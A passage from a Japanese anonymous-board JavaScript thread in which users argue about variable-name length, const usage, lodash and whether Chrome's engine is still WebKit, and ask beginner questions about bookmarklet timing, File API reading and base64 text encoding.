for文が視界外にあればその値がどのように移り変わっていくか見に行かないといけないかもしれないでしょ?

これはiやjに数文字使っただけで解決できるようなものじゃないのよ
それこそ数十文字使って文章の変数名をつければ分かるかもしれない
でもね、そんなことよりも、for文が視界に収まればiやjでいいのよ
つまり、そういうことを言ってる
634 :
2017/03/11(土) 15:58:06.47 ID:???
>>633
>>605に対する>>607 >>611の反応に対して答えといてくれ
635 :
2017/03/11(土) 15:59:23.91 ID:???
>>633
具体例出してやるな。

関数の中に3つの変数がある。
y、s、p

何の変数か言ってみろ
636 :
2017/03/11(土) 16:00:32.16 ID:???
ただの荒らしやろ・・・構うなよ
637 :
2017/03/11(土) 16:02:25.17 ID:???
> for文が視界外にあればその値がどのように移り変わっていくか見に行かないといけないかもしれないでしょ?

値は一旦代入したら変えません
constを使うのが普通
638 :
2017/03/11(土) 16:03:51.68 ID:???
> for文が視界に収まればiやjでいいのよ

また後出し条件かよw

for文が視界に収まってないときは
長くするもんだーって正反対のことを言い出しそうだなw

>>591
> 変数名はなるべく短くすべきだよ
名前はなるべく短くするの間違い
639 :
2017/03/11(土) 16:05:28.15 ID:???
>>634
それはもう言った
つまりなるべく短くするということは良いことなので、それを否定的なニュアンスで使うのはおかしい

>>635
それは分かるわけがない
でも変数名が長かろうと同じことというのはさっき行った通り
640 :
2017/03/11(土) 16:05:43.93 ID:???
慣例的に使われる変数名を除いて
一文字の名前で許されるのは、一行(=視界)で収まっているときだけ
641 :
2017/03/11(土) 16:05:52.69 ID:???
すまんconstって積極的に使ってくべき?
一度も使ったこと無い
642 :
2017/03/11(土) 16:07:10.67 ID:???
>>639
> でも変数名が長かろうと同じことというのはさっき行った通り

長かろう?

お前は関数の中に変数を26個より多く作るのか?

作らないだろ?であれば、お前の関数はすべて変数名は一文字にできるはずだ。

> 変数名はなるべく短くすべきだよ
って考えてるお前は、全てのローカル変数名が一文字になっていなければいけない
643 :
2017/03/11(土) 16:09:07.12 ID:???
>>641
> すまんconstって積極的に使ってくべき?

使っていくべき

有名なスタイルガイドでもそう書かれている
https://mitsuruog.github.io/javascript-style-guide/#%E5%8F%82%E7%85%A7references
644 :
2017/03/11(土) 16:09:16.23 ID:???
>>638
具体例を後出し条件と言われてもな

でもここまで書いて読み直して気づいたわ
「変数名はなるべく短くすべき」ってのは
「1タイプ増えるとそれだけミスが増え、修正にかかる時間も必要になる」
って言うのを受けてのことだったんだな

通りで話が噛み合わないはずだわ
これは恥ずかしい
斜め読みで最近知ったウンチク垂れ流してごめんなさい
本当に申し訳ない
645 :
2017/03/11(土) 16:10:17.11 ID:???
>>642

使っていくべきじゃない

タイプ数が増えるから
646 :
2017/03/11(土) 16:12:59.35 ID:???
>>644
何度も指摘してるだろ
馬鹿め
647 :
2017/03/11(土) 16:13:47.00 ID:???
>>646
平伏致します
申し訳ございませんでした
648 :
2017/03/11(土) 16:16:47.41 ID:???
今日の賑やかしレス稼ぎはこんなところですか?
649 :
2017/03/11(土) 16:20:12.87 ID:???
重要なのはわかり易い名前=可読性
文字数じゃない。

タイプ数をいくら減らした所で
可読性には何ら影響はない。

そもそも人間は単語を一文字一文字
読んでいるわけじゃないのだから
650 :
2017/03/11(土) 16:22:44.20 ID:???
単語を一文字一文字読んでなくとも長いほうが読みにくいだろ!
という突っ込み禁止
651 :
2017/03/11(土) 16:24:13.36 ID:???
>>643
つまり参照でないプリミティブならconst使わなくて良いということでいい?
>>637は値は変えないって書いてあるから
652 :
2017/03/11(土) 16:24:26.80 ID:???
>>650
数文字程度では影響ない
653 :
2017/03/11(土) 16:26:10.02 ID:???
>>652
エディタの横の文字数がちょくちょく話題になったりもするし結構センシティブなものだろ
654 :
2017/03/11(土) 16:28:30.11 ID:???
>>651
まあconstは本当に定数、つまり全部大文字使うような変数だけでいいんじゃない?
自分も張り切って全constとかときたまやり始めることあるけど、別に実際役に立ってるとは思わないし
655 :
2017/03/11(土) 16:30:49.22 ID:???
>>653
それは単語の文字数の話じゃない
656 :
2017/03/11(土) 16:31:13.47 ID:???
9割constは9割letより見にくそうな気がする
657 :
2017/03/11(土) 16:32:51.95 ID:???
>>654
constを使うかどうかは本質的ではなくて
一旦変数に入れた値を書き換えないということが重要

その時にconstであれば書き換えないという意図が
伝わりやすいから使うってだけ

> 別に実際役に立ってるとは思わないし
値が変わらないことが明確になるから
他で代入しているところを探す必要が無いという
メリットが実際にある
658 :
2017/03/11(土) 16:33:18.74 ID:???
>>654
ですよね
安心しました
659 :
2017/03/11(土) 16:33:20.37 ID:???
>>655
事実横が短いほうが読みやすいよ
結局はバランスでしょ
文字数削減も大事、分かりやすい変数名も大事
というか分かりやすい変数名って適度に短いことだよね
660 :
2017/03/11(土) 16:34:12.65 ID:???
>>657
一旦変数に入れたら書き換えるな、って理解不能
661 :
2017/03/11(土) 16:34:20.61 ID:???
>>657
他で代入しているところを探す必要
というのがピンとこないや
662 :
2017/03/11(土) 16:35:17.33 ID:???
>>660
関数型とかそういう方面の人の考えらしいよ
セットで付くのが副作用厳禁だね
663 :
2017/03/11(土) 16:36:21.17 ID:???
オブジェクトにわざわざsetterとgetterつけてobj.set()で書き換えるのと
1個の変数に入れて変数の中身を書き換えるのと
変数の中身の保持って意味では一緒じゃん?
664 :
2017/03/11(土) 16:36:22.14 ID:???
>>659
> 事実横が短いほうが読みやすいよ

それは単語の文字数の話ではない
665 :
2017/03/11(土) 16:37:18.60 ID:???
>>662
むしろオブジェクト指向が行き過ぎた人の考えじゃないのか
666 :
2017/03/11(土) 16:38:16.19 ID:???
>>660

var sum = 0; // 合計

console.log(sum) // ← 出力されるの合計じゃないじゃん。ウソじゃん

for (var i = 0; i < 10; i++) {
 sum = sum + foo(i)
)
667 :
2017/03/11(土) 16:38:43.26 ID:???
>>664
はいはい都合の悪い話は除外除外
頑固だなお前
668 :
2017/03/11(土) 16:39:09.31 ID:???
一旦変数にいれて書き換えないならば>>666のようなウソがなくなる
669 :
2017/03/11(土) 16:39:57.32 ID:???
>>667
名前が長くても改行入れれば横は短くできる。
はい論破w
670 :
2017/03/11(土) 16:40:11.49 ID:???
666は一体どういうことなんだ
671 :
2017/03/11(土) 16:41:33.24 ID:???
>>666
1から10までの数字を全部合計したものを得たいときどう書くんだ
672 :
2017/03/11(土) 16:43:21.25 ID:???
>>669
論破ご苦労さん
それはそれでおいといて
いい加減真面目に本当に役立つ話をしないか?
673 :
2017/03/11(土) 16:45:46.48 ID:???
>>671
こう

const num = sum(1, 10)

function sum(from, to) {
var n = 0
return n
for (var i = from; i <= to; ++i ) n += i
}
674 :
2017/03/11(土) 16:47:27.27 ID:???
>>671
https://lodash.com/docs/

const total = _.sum(_.range(1, 10));
675 :
2017/03/11(土) 16:47:36.59 ID:???
>>670
変更する予定が無いなら初期化時にちゃんと値を入れようって事かな?
676 :
2017/03/11(土) 16:47:55.94 ID:???
>>673は間違い
677 :
2017/03/11(土) 16:48:02.20 ID:???
で、でたーwww
678 :
2017/03/11(土) 16:48:41.73 ID:???
>>675
変数だとね。名前が嘘になってしまうのですよ。
679 :
2017/03/11(土) 16:49:15.92 ID:???
>>677
でたもなにもずっといるわw
680 :
2017/03/11(土) 16:49:32.53 ID:???
頭がおかしくなる
681 :
2017/03/11(土) 16:51:23.95 ID:???
そこまで関数型にこだわるんなら関数型系のAltJS使ったほうが良くね?
682 :
2017/03/11(土) 16:52:28.31 ID:???
>>673はconstがどうこうではなくsumをnに変えただけ
683 :
2017/03/11(土) 16:53:11.68 ID:???
>>681
関数型系のAltJSで、将来性を期待できるほど
バックについている企業、コミュニティが
大きいものがあればそうするよ。

残念ながら、MS、Google、Mozillaなどと言った
そうそうたるメンバーが参加してる言語とは比べ物にならない
684 :
2017/03/11(土) 16:54:03.27 ID:???
皮肉でしょ
constで書けない部分を全部外に出せば全部constで書けたようにみえ……ないっていう
685 :
2017/03/11(土) 16:56:39.77 ID:???
constは「絶対書き換えたくない、定数として扱いたいもの」を
うっかり書き換えないようにしたいときだけ使えば良い

結局これでいいんだな
686 :
2017/03/11(土) 16:57:37.29 ID:???
JavaScriptにもreduceがあるから、sumのような
前の結果に付け加えていく処理をconstだけで
作ることはできるが、

実際に使うとなったら、読みづらく関数型言語のように
標準のライブラリも関数型チックなものは充実してないから、
lodashのような関数型風に書くことができる
ライブラリを使うのが現実的
687 :
2017/03/11(土) 16:58:17.96 ID:???
>>685
というか、普段からバグを少なくするために
変数を書き換えたりしないから、
それならconstでいいんじゃね?ってなるよ
688 :
2017/03/11(土) 16:58:42.17 ID:???
>>685
うっかり書き換えないようにしたいときだけ
と言うのは一番まともそうで一番ない理由だと思う
何にせよ、ニュアンスの表記というのが一番大きい
だからどう活用するかは人次第
689 :
2017/03/11(土) 17:00:31.69 ID:???
>>688
if( variable === SOME_CONSTANT_VAR )
と書くべきところ
if( SOME_CONSTANT_VAR === variable )
のように入れ替えて
if( SOME_CONSTANT_VAR = variable )
というふうに間違えて代入してしまう、というありそうな例
690 :
2017/03/11(土) 17:01:53.47 ID:???
constを使っていれば、>>689のようなバグもなくなる
691 :
2017/03/11(土) 17:02:09.66 ID:???
>>687
何だかんだ言ってconstの最大の欠点は文字数じゃね?
もしconstがSwiftみたいにletでscopedとかだったら、みんな前者を使い出す気がする
結局文字数が掛かるから、それは特別感を出すために使われてしまう
692 :
2017/03/11(土) 17:02:20.63 ID:???
変数を書き換えないためにvar宣言をconst宣言に変えて関数に追い出すでしょ
関数の中でvar宣言すると書き換えバグが起きるかもしれないからconstにするでしょ
693 :
2017/03/11(土) 17:03:32.47 ID:???
>>690
ごめんけど、自分はそのミスを最低10年はしたことがないし、する想像もできない
694 :
2017/03/11(土) 17:04:42.71 ID:???
>>691
constがletでletがscoped の間違い
695 :
2017/03/11(土) 17:04:47.21 ID:???
>>693
想像もできないやつにはメリットがわからんだろうなw

でも実際に起ってるからね
ぐぐってみ
696 :
2017/03/11(土) 17:05:29.94 ID:???
>>692
> 変数を書き換えないためにvar宣言をconst宣言に変えて関数に追い出すでしょ

いや、追い出さない。コードのどこにもvarがなくなる
697 :
2017/03/11(土) 17:07:36.91 ID:???
まあ定数としたい値を間違えて書き換えるバグの防止としては意味ある
変数を書き換えたりしないっつーのはありえんがな
698 :
2017/03/11(土) 17:07:41.17 ID:???
>>695
エディタが警告出すような極めて低レベルなことだと思うけど
そんなことのためにconstとか、constに失礼
699 :
2017/03/11(土) 17:08:06.30 ID:???
でもまあ、関数型の一番のメリットは
コードが短くなるってことだと思う
700 :
2017/03/11(土) 17:11:52.85 ID:???
>>699
関数型というかメソッドチェーンが非常に優秀ってことは正しいな
Observableとは最たる例だと思う
701 :
2017/03/11(土) 17:15:37.00 ID:???
const calc = {
sum: function(from, to){
var sum = 0; for(let i=from; i<=to; i++) sum+=i; return sum;
}
}
calc.sum(1,10);
console.log( calc.sum(1,10) );

書いてから気付いたがconstにする理由がない
702 :
2017/03/11(土) 17:17:23.00 ID:???
>>701
だからそれは間違い。

constにすることで、バグは少なくなるが、
自分で関数型風のライブラリを作ることは
バグを減らすことにはつながらない。

lodashを使おうぜ
703 :
2017/03/11(土) 17:21:00.80 ID:???
明らかな間違いや極論をぶちあげて他人に訂正させて勉強する
704 :
2017/03/11(土) 17:21:41.17 ID:???
それがユッカクオリティ
705 :
2017/03/11(土) 17:25:14.63 ID:???
lodashの何が嫌かって、
_. ←コレ
もうメソッド拡張すればいいじゃん
706 :
2017/03/11(土) 17:33:19.15 ID:???
そう言えばモジュールってグローバル別になるんだよね?
ならオレオレメソッド追加しちゃいけない理由消えるな
707 :
2017/03/11(土) 17:34:26.26 ID:???
>>705
メソッド拡張は過去の事件で嫌われてるからなw

_.が嫌いなら_.chain(value)を使えばいいよ

例えば、>>674だったら、このように書くことができる。
const total = _.chain(1).range(10).sum();

_.chainがあるじゃないか突っ込まれるだろうけど、
それだけでしょ? それだけならnoconflictで別名にしたり
何かのオブジェクトに付け加えることもできるだろう
708 :
2017/03/11(土) 17:37:18.23 ID:???
>>706
> そう言えばモジュールってグローバル別になるんだよね?
ならんよ。ってなったらグローバルじゃないしw

グローバルみたいに見える空間が、グローバルじゃないってだけで
本当のグローバルは共有

そして標準ビルトインオブジェクトも本当のグローバル空間にいるので
オレオレメソッドを追加すると、他にも影響が出る
709 :
2017/03/11(土) 17:38:14.89 ID:???
そういえば最近どんどんpure-javascript案件増えてるな
710 :
2017/03/11(土) 17:43:16.18 ID:???
pure-javascriptってなんだ?
ライブラリを使わないってことか?自作も含めて?

pure perlって言えば普通はPerlだけで実装されたモジュールを使う=
C言語で実装されたモジュールを使わないって意味なんだが。

ブラウザでJavaScriptの場合は殆どの場合PureJavaScriptだろう。
jQueryを使おうがLodashを使おうがAngularを使おうが

あ、そうかFlashを使わないって意味か
あとサーバーサイドでC言語モジュールを使わない
711 :
2017/03/11(土) 18:14:40.08 ID:???
くだらない派閥争いしても意味ないよ
各自好きなようにコーディングすればいい
プロジェクト配下ならそのプロジェクトのルールに従うだけ
712 :
2017/03/11(土) 18:25:41.12 ID:???
>>711
ほんこれ
他に気にかけるところはたくさんあるだろうに
713 :
2017/03/11(土) 18:29:06.10 ID:???
そう。ただし勘違いしてはいけないのは、
どれでもいいのであって、
どうでもいいのではないということ。

だから、適当なツールを使ってちゃっちゃと終わらせれば良いんだよ。
自分で規約とか作るのは時間の無駄

有名所の何かを採用すればいい。
そうすれば、それに対応したツールもある。

具体的に言おう、Qiitaとかでオレオレコーディング規約を
公開してるやつ。今すぐやめろ
714 :
2017/03/11(土) 18:33:31.69 ID:???
自分で規約作りたいひとは作ればいいんだよ
それを人に強要したり延々と主張する必要はない
715 :
2017/03/11(土) 18:34:05.90 ID:???
>>713
あーたしかにあれらは公開しないほうが良いかもね
716 :
2017/03/11(土) 22:25:35.89 ID:???
そうか?そもそもそんなつまらん物に目が行くような
自分は未熟ですって言ってるだけにしか聞こえないが
717 :
2017/03/11(土) 22:39:50.82 ID:???
初心者さんがそういうの真似しかねないって意味で
718 :
2017/03/11(土) 22:40:39.60 ID:???
自分ってw
お前他人のこと考えたことないんか?
他人と関わらずに生きていくきか?
719 :
2017/03/11(土) 22:45:16.15 ID:???
>>718
文盲か
720 :
2017/03/11(土) 22:58:06.36 ID:???
有名どころしか使わないのは初心者がやりがちな発想だな。
有名どころのコーディング規約で有名どころのライブラリを使って有名どころのデザインで作るとどこにでもあるサイトが出来上がる。
無難な選択ではあるが、独創性がかけらもなくなるんだよな。
721 :
2017/03/11(土) 22:58:23.06 ID:???
理解するための脳もないか
せっかく>>717がヒント言ってるのに
722 :
2017/03/11(土) 22:59:19.30 ID:???
>>720
独創性(笑)

お前が作った独創性なものってなんだ?w
723 :
2017/03/11(土) 23:16:49.58 ID:???
>>720
はわかりやすい釣りだな
724 :
2017/03/11(土) 23:38:10.09 ID:???
蘊蓄だけにこだわる暇なITドカタは惨めだよ
725 :
Name_Not_Found
2017/03/11(土) 23:43:05.40 ID:Bw9n+HUq
サイト上のjsをいろいろ繰り返し叩いていくブックマークレット作ってるんですが
サイト側の処理が終わったかどうかを取る方法があまりよく分からないので
setTimeoutを以下のように連発してるんですがこういうのはどうなんでしょうか

javascript:(function(){
function a(){
いろいろ処理;
setTimeout(b();,3000);}
function b(){
もろもろ処理;
setTimeout(c();,5000);}
function c(){
あれこれ処理;
setTimeout(a();,600000);}
a();})();
726 :
2017/03/11(土) 23:45:46.78 ID:???
>>725
もう少し日本語コミュニケーション上達させる方が先だろ
アドバイス欲しいなら状況を相手に正しく伝えるレベルにならないと
727 :
2017/03/11(土) 23:49:14.94 ID:???
>>725
対象を配列に突っ込んで、
「配列に要素が残っている限り、配列から要素を1つ取り出してjs実行、その後setTimeoutでループ」な関数作れば
728 :
2017/03/11(土) 23:54:54.51 ID:???
>>722
後の仕様変更に備えるためや他の人が触って意図しない引数が来たときのために
処理前にガチガチに確認するやり方が功を奏した経験がほとんどないので

独自に高い開発効率をたたき出す手法を編み出しました!
729 :
2017/03/11(土) 23:55:14.98 ID:???
ほらな、聞き方すら分からないからこんなトンチンカンな答がでてくる
730 :
2017/03/11(土) 23:56:50.62 ID:???
ここまでが回答を引き出すための俺の自演
731 :
2017/03/11(土) 23:59:30.36 ID:???
>>725
ブックマークレットは改造パッチみたいなもんだからそんなもんだよ
きちんとやるならasnc-awaitくらいは使っていきたいけどね
732 :
2017/03/12(日) 00:00:33.62 ID:???
>>721
後出し条件はもうウンザリ
さっさと敗北を認めろ
733 :
2017/03/12(日) 00:06:22.43 ID:???
あ、後出し条件だって言われたやつかw
自分が言われて悔しかったもんだから、
それを使ったんだな
734 :
2017/03/12(日) 00:25:01.35 ID:???
ま〜た自分より下を作ろうと必死なカスばかりわいてるのかよ
735 :
2017/03/12(日) 00:28:03.43 ID:???
javascriptはなぜ最初からpromiseやasync/awaitを備えられなかったんでしょうか
736 :
2017/03/12(日) 00:45:11.57 ID:???
>>735
それは他の言語がなんでバージョンアップして
新機能を追加しているんでしょうか?って
言ってるのと同じことだ。
737 :
2017/03/12(日) 05:41:55.43 ID:???
こういうスレじゃ横入り横入れられも当然なのにどうして同一人物と思いたがるのかね?
誰が誰だろうとどうでもいいじゃん
俺が前論破したやつだから悔しがって対抗してきたな とか小学生かよw
738 :
2017/03/12(日) 09:28:14.91 ID:???
>>734
お前もいい加減、うざい
はたから見れば>>475は大した違いはないし、両方ともうざい
739 :
2017/03/12(日) 09:36:24.44 ID:???
いきなり遠投してどうした
740 :
2017/03/12(日) 10:46:03.84 ID:???
土曜の15時から18時半までの間に120レス超とか馬鹿かこいつら
ほんと迷惑
741 :
2017/03/12(日) 13:38:19.38 ID:???
>>740
嫌なら見るな
742 :
2017/03/12(日) 14:01:13.37 ID:???
スレチの分際で図に乗んな
743 :
2017/03/12(日) 14:48:51.84 ID:???
>>740
誰かがJS人気ないとか言うから、心優しい人たちが必死に人気を演出してくれたんでしょ
744 :
2017/03/12(日) 14:56:26.86 ID:???
>>740
自分より下を作ろうと必死なんだろ。許してやれ。
745 :
2017/03/12(日) 21:52:22.69 ID:???
自分より下を作る人を見下す人か
746 :
2017/03/12(日) 22:38:24.83 ID:???
「自分より下を作る」はどう見ても日本語がおかしい
彼の言葉で表すなら>>744は自分より下を作る人を作る人になるわけだが
747 :
2017/03/12(日) 22:47:42.79 ID:???
いろんな環境使ってる人、デバッグが一番やりやすいのは何か教えて
748 :
2017/03/12(日) 22:59:34.11 ID:???
>>747
Chrome
749 :
2017/03/13(月) 03:38:32.27 ID:???
統合開発環境はFirefoxの方が進んでる
誰もそれ使ってないけど
750 :
2017/03/13(月) 04:16:15.66 ID:???
>>749
それは100%無い
情報が古すぎる
今はchromeの独壇場だよ
751 :
2017/03/13(月) 05:40:17.27 ID:???
FILE API でテキストを読み込ませる処理でアドバイス欲しいです

D&D形式ではなくinput typeのFILEから1つのtxtファイルを選択して読み込ませたいのですが
ファイル選択待ちの間にonloadが止まってしまいます。
ローカル環境では一瞬で止まるのでしょうか?

以下、流れ
参照ボタンで発火
DOM idからファイル情報を取得
ifで振り分け(テキストファイルのみ実行許可)
以降はFILE APIです

発火のタイミングを参照終了後にする方法があれば良いのですが、便利な方法などありませんか?

ボタンを二回押す方式なら可能なのですがそれだと面倒なので、ファイルを選択して読み込ませたと同時に発火させたいです。
752 :
2017/03/13(月) 05:47:30.44 ID:???
日本語でおk
753 :
2017/03/13(月) 06:42:13.23 ID:???
>>751
コードを貼ってくれた方が回答を得やすいと思うよ
754 :
2017/03/13(月) 06:57:27.17 ID:???
>>750
Firefoxでは動くのにChromeじゃ動かないコードは掃くほどあるからな
動作確認はChromeの方がいいかもなw
755 :
2017/03/13(月) 07:52:09.65 ID:???
>>754
IEでは動くのにFirefoxじゃ動かないコードは掃くほどあるからな
動作確認はIEの方がいいかもなw
756 :
2017/03/13(月) 08:09:46.61 ID:???
>>754
chromeで動かない=webkitで動かないってことにほぼ等しい
今の時代そんなコードはゴミに等しいんだよ
開発の確認で使うならFireFoxは今すぐ投げ捨てたほうがいい
757 :
2017/03/13(月) 08:22:13.46 ID:???
IEってほんとまともになってきたよね・・・
758 :
2017/03/13(月) 08:46:57.35 ID:???
アロー演算子認識してくれなくね?
759 :
2017/03/13(月) 09:47:19.22 ID:???
>>756
webkitはもう切り捨ててるよ。
使ってるブラウザ少ないし
IEよりもシェアが低い
760 :
2017/03/13(月) 13:01:22.95 ID:???
>>759
君恥ずかしいからもう来ない方がいいぞ
761 :
2017/03/13(月) 13:24:10.14 ID:???
chromeはdocument.headで操作もできないヘボ
762 :
2017/03/13(月) 15:23:28.80 ID:???
>>751 です。
解決できました。

jsの発火タイミングをonChangeに変更したらonloadが正常に動きました。
問題が解決する前はファイルを選択画面を表示させるボタンを押したと同時に発火していたため、onloadが終了を確認する前に強制停止していたようです。

ちなみに、ローカルでもサーバーでも2往復して変化がなければ強制停止するみたいです(IE、FFで確認)
763 :
2017/03/13(月) 15:31:29.62 ID:???
うん。初心者が躓きやすいポイントだね。
でもすぐ気づいたのは素晴らしいよ。
その調子で頑張ってね。
764 :
2017/03/13(月) 19:53:03.00 ID:???
また問題発生。
FILE APIでwindowsのコンピュータに生成したテキストファイルをbase64エンコードをかけて保存。

読み出すと英数字は取得できるが、デコードをかけると文字化けを起こす。

どんな問題が考えられますかね?
765 :
2017/03/13(月) 20:45:04.48 ID:???
文字コード
766 :
2017/03/13(月) 21:32:43.05 ID:???
jsならutf8に統一せんと今後苦労するぞ
767 :
2017/03/13(月) 21:36:53.92 ID:???
>>760
webkitは、ほぼSafari専用だよ
他のブラウザはwebkit使ってない
知らないの?
768 :
2017/03/13(月) 22:05:21.00 ID:???
>>767
釣りなんだろうけど、シェアトップのChormeはWebkitベースだし、スマホのシェアも
約半数がiPhone Safariで、次点でAndroid Chromeだけど、これらもWebkitだよ
ログをとっていなくても、サイト制作経験があるなら
-webkit-という接頭辞で自ずとわかるはずなんだけどね
769 :
2017/03/13(月) 22:22:08.58 ID:???
今はandroidの標準ブラウザもwebkitになってしまってる
世の中ほぼ全てがwebkitな時代に突入してるんだよ
770 :
2017/03/13(月) 22:29:53.21 ID:???
Blink「…」
771 :
2017/03/13(月) 22:33:54.45 ID:???
純粋なWebkitはSafari, iOS Safari
WebkitからフォークされたBlinkがGoogle Chrome, Android Chrome, Android標準ブラウザ, Opera
歴史的経緯からGoogle Chromeのベンダー接頭辞は -webkit、Operaは知らん
他、ニンテンドー3DS, PS3,PS4...etc
772 :
2017/03/13(月) 22:55:54.46 ID:???
3DSのブラウザ、webkitだったのか
使えない機能がめちゃ多くてメモリ少なくてかなりきついブラウザだった
773 :
2017/03/13(月) 23:04:21.38 ID:???
>>765
>>766
文字コードチェックしたところ、js,css,htmlファイルともにutf-8のボム無しでした。
ですが、jsから吐き出されたtxtファイルはbase64エンコードを通したものだけshift-JISに変換されていたようです。

windowsに保存されたので文字コードが変換されたのかと思い、念のためにbase64を通さずFILEAPIだけで生成してみたところ、こちらはutf-8ボム無しで保存されていました。

原因はほぼ間違えなくbase64エンコード関係だとみています。
ですが、保存は最終的にはFILEAPIで行うのに途中で文字コードが変わるんですかね?
774 :
2017/03/13(月) 23:46:51.16 ID:???
>>773
抜粋したソースでいいから貼ってもらえないかな?
775 :
2017/03/13(月) 23:50:00.22 ID:???
なんぞライブラリ通して使っててそのライブラリが勝手にやってるとかじゃねーよな
776 :
2017/03/14(火) 00:04:16.70 ID:???
>>768
> 釣りなんだろうけど、シェアトップのChormeはWebkitベースだし、スマホのシェアも

釣り? ChormeはWebkitベースじゃない
当然スマホもiOSを除きWebkitベースじゃない
そしてWebkitベースじゃないものがほとんど
777 :
2017/03/14(火) 00:07:16.44 ID:???
直接関係なくかつ無知で申し訳ないんだが
File APIの、ユーザにとっての安全性って
要するに「ユーザに選ばせるから通常のinput type="file"と同じよ」ってことでいい?
んで機能的には非表示iframeをtargetにしてformからアップロード、ってさせなくてもjsがデータ受け取れるよ的な
778 :
2017/03/14(火) 00:09:30.87 ID:???
Chromeの中に含まれていたWebkit由来のコードは
2014年の時点ですでに半分にまで減っている
今は殆どないだろう
779 :
2017/03/14(火) 00:12:43.61 ID:???
おや、QtもWebkitを廃止してるみたいだね
780 :
2017/03/14(火) 00:18:39.77 ID:???
>>771
> 歴史的経緯からGoogle Chromeのベンダー接頭辞は -webkit、Operaは知らん
違う。Google Chromeのベンダー接頭辞はつけない。

Blink、新機能に対して新たなベンダープレフィクスを追加しない決定
https://cpplover.blogspot.jp/2013/05/blink.html

今も残っているとしたら、それは過去の遺産だろう

OperaはChromeと同じエンジンを使っている
Webkitではない
781 :
2017/03/14(火) 00:19:52.39 ID:???
CSS からベンダプレフィックスという仕組みが消える日
https://hyper-text.org/archives/2013/05/goodbye_vendor_prefixes.shtml

「ベンダプレフィックスに -chrome- が増えるの?」 という質問に対して、

今後、新しい機能に対してベンダプレフィックスを増やすことはしない
実験的な DOM / CSS の機能に関しては、about:flags で設定可能にする
正式にリリースが可能になった時点で、dev/canary チャネルにおいてデフォルト有効の状態にする
既存の -webkit- ベンダプレフィックスは引き続き使用可能
プレフィックス付きの記述をどのタイミングで廃止するかは、統計データを基に決める
782 :
2017/03/14(火) 00:21:39.47 ID:???
>>777
> んで機能的には非表示iframeをtargetにしてformからアップロード、ってさせなくてもjsがデータ受け取れるよ的な

iframeは必要ない。そんなものを使わなくても、formからsubmitしなくても
input type="file"でファイルを選んだ時点でjsからデータ取れる
783 :
2017/03/14(火) 00:26:34.26 ID:???
>>782
言い直しただけやん
784 :
2017/03/14(火) 00:27:37.30 ID:???
ベンダプリフィックスが -webkit- だから
これはwebkitに違いないって思ってたのか
無知だなぁw
785 :
2017/03/14(火) 00:28:05.50 ID:???
>>783
よく読もうねおじいちゃん
786 :
2017/03/14(火) 00:33:40.92 ID:???
元々はwebkitからforkしてました
だんだんとwebkitのコードから独自のコードに変えていきました
当時のベンダープレフィックスはwebkitだったけど今後は-webkitでも-chromeでもなくprefix無しになります

どれも数年前の話からそのまま進んでるといえど
>ChormeはWebkitベース
>歴史的経緯からGoogle Chromeのベンダー接頭辞は -webkit
これ間違ってないように見えるのだが
787 :
2017/03/14(火) 00:34:41.10 ID:???
-webkit- をサポートしていたら、それはwebkitというのなら、
Edgeはwebkitってことになるなw

https://msdn.microsoft.com/en-us/library/mt270097(v=vs.85).aspx

Supported WebKit APIs

For improved compatibility, Microsoft Edge supports a variety of "-webkit-" prefixed APIs.
Below is a list of these supported APIs.

Google翻訳

サポートされているWebKit API

互換性を向上させるために、Microsoft Edgeでは、プレフィックス付きのさまざまな "-webkit-" APIをサポートしています。
以下は、これらのサポートされているAPIのリストです。
788 :
2017/03/14(火) 00:35:00.58 ID:???
この阿呆はマイクロソフト系ばかりの平社員PGって感じだな
もっと現実的をみろよ
789 :
2017/03/14(火) 00:36:34.72 ID:???
>>786
Webkitのコードは削除されたのでもはやWebkitではない。
Blinkで動いてテストしても、Webkitで動くことにはならないのだから

>歴史的経緯からGoogle Chromeのベンダー接頭辞は -webkit
互換性のために残しているだけ。
Edgeが互換性のために-webkit-をサポートしているのと何も変わらない
790 :
2017/03/14(火) 00:39:03.32 ID:???
Chromeで動かないJSコード書くアレな人はまだムキになって屁理屈捏ねてるの?
791 :
2017/03/14(火) 00:39:54.93 ID:???
Chromeで動けば、Safariでも動くって思っている人には
夢見せてあげれば良いんじゃないっすかね?w

Safariで動くかテストした?って聞かれれば
Chromeで動いたからだいじょっブッスよwww
って言っておk

BlinkからWebkitのコードが削除され
WebkitからChrome用のコードが削除されてるってことは
知らなかったことにしておけば良いwww
792 :
2017/03/14(火) 00:41:33.15 ID:???
>>789
blinkにはwebkitのコードは最早存在しないということか?
そういうのってどの辺みればわかるの
793 :
2017/03/14(火) 00:42:19.90 ID:???
オープンソースなんだからgithubにでもあるだろ
794 :
2017/03/14(火) 00:52:37.89 ID:???
※確認していません
795 :
2017/03/14(火) 00:54:30.30 ID:???
確認しろよw
796 :
2017/03/14(火) 00:57:31.59 ID:???
http://caniuse.com/

Browser scores
Chrome 56: 275
Firefox 52: 274
Safari 10: 217
Edge 14: 210


これみても、ChromeとFirefoxは同じぐらいだけど、
そこから2割差が開いてSafariはEdgeと同じぐらいだからな。
これで同じと思っちゃうのは頭が悪い
797 :
2017/03/14(火) 00:58:41.80 ID:???
>>791
話そらすのに必死だなおまえ
Chromeで動かないレベルのコード書くバカなんだからそろそろ自重しないと
798 :
2017/03/14(火) 01:00:01.81 ID:???
○○ベースっていう言葉のいみすら分からないの?
799 :
2017/03/14(火) 01:03:01.96 ID:???
WebKitはKDEプロジェクトで開発されたKHTMLをフォークして作られたのだから
KHTMLベースと言うべきだ。どんなに変わっとしてもだ!

https://ja.wikipedia.org/wiki/WebKit

> WebKitは、元々アップルのmacOSに搭載されるSafariのレンダリングエンジンとして、LinuxやBSDといった、
> Unix系用のレンダリングエンジンであるKHTMLをフォークして開発された。
800 :
2017/03/14(火) 01:03:29.83 ID:???
>>798
WebKitベースなどというものはない。
あるのはKHTMLベースだけだ
801 :
2017/03/14(火) 01:04:57.94 ID:???
新Webエンジン「Blink」?GoogleはなぜWebKitを捨てたか?
http://ascii.jp/elem/000/000/778/778554/index-2.html
802 :
2017/03/14(火) 01:16:36.15 ID:???
>>774
>>775
文字化けの原因は不明でしたがこの記述で正常に動作するようになりました。
レスありがとうございました。

for(var i=0;i<7415;i++){
jumeirah[i] = decodeURIComponent(unescape(window.atob(palm[i]))); // Way of encoding
jebelali[i] = jebelali[i];
}
for(var i=0;i<7415;i++){
jumeirah[i] = decodeURIComponent(escape(window.atob(jumeirah[i]))); // Way of decoding
jebelali[i] = jebelali[i];
}
803 :
2017/03/14(火) 01:26:50.74 ID:???
とりあえず>>789
>Webkitのコードは削除されたのでもはやWebkitではない
は偽
804 :
